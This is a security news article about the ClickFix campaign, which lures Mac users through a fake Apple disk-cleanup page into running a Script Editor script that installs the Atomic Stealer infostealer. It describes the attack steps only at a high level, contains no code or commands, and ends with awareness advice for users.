Security researchers have recently discovered a malicious campaign known as ClickFix that specifically targets Mac users. This campaign uses a counterfeit Apple-themed webpage that misleads users into believing they are receiving legitimate instructions on how to ‘reclaim disk space on their Mac’.

Understanding ClickFix

ClickFix is a social engineering tactic that tricks individuals into executing harmful commands on their systems, often under the pretense of fixing an issue or performing regular maintenance. Initially focused on Windows platforms, this approach has expanded to include macOS and Linux users.

According to researchers, the traditional method for executing ClickFix attacks on macOS involved persuading users to copy and paste malicious commands into the Terminal application, masked as troubleshooting commands. In response to these attacks, Apple introduced a new security feature in macOS 26.4 that scans commands before they are executed, making it more challenging for attackers.

Consequently, malicious actors have adapted their strategies, shifting towards browser-triggered workflows to activate Script Editor, a built-in code editor for AppleScript and JavaScript for Automation. Both Terminal and Script Editor are standard applications included with macOS, making them convenient targets for exploitation.

The Deceptive Process

For victims, the attack unfolds in a series of steps:

• Users visit the fraudulent webpage and follow the provided instructions.
• They click a button labeled “Execute,” triggering the attack.
• A prompt appears, asking for permission to open Script Editor.
• Script Editor launches, pre-filled with the attackers' malicious script.
• Depending on their macOS version, users may receive an additional warning about executing the script.
• If users disregard the warning and permit the script to run, it will silently download and execute an Atomic Stealer variant.

The Atomic Stealer, also known as AMOS, is a subscription-based malware product sold to cybercriminals. It has the capability to gather system information, extract sensitive data from Keychain (Apple's password manager), and retrieve autofill data, passwords, cookies, and credit card information from web browsers and cryptocurrency wallets.

Researchers have shared various indicators of compromise related to this malware delivery method, urging users to remain vigilant and cautious when interacting with online content that appears to be from reputable sources.

As cyber threats evolve, it is crucial for individuals to be aware of the tactics employed by attackers and to implement best practices for maintaining their cybersecurity. Users are encouraged to scrutinize URLs, avoid clicking on suspicious links, and utilize security features provided by their operating systems.

In an age where digital security is paramount, the ClickFix campaign exemplifies the need for heightened awareness among Macintosh users. Staying informed about such threats and understanding how they operate can significantly reduce the risk of falling victim to these malicious schemes.

Source: Help Net Security News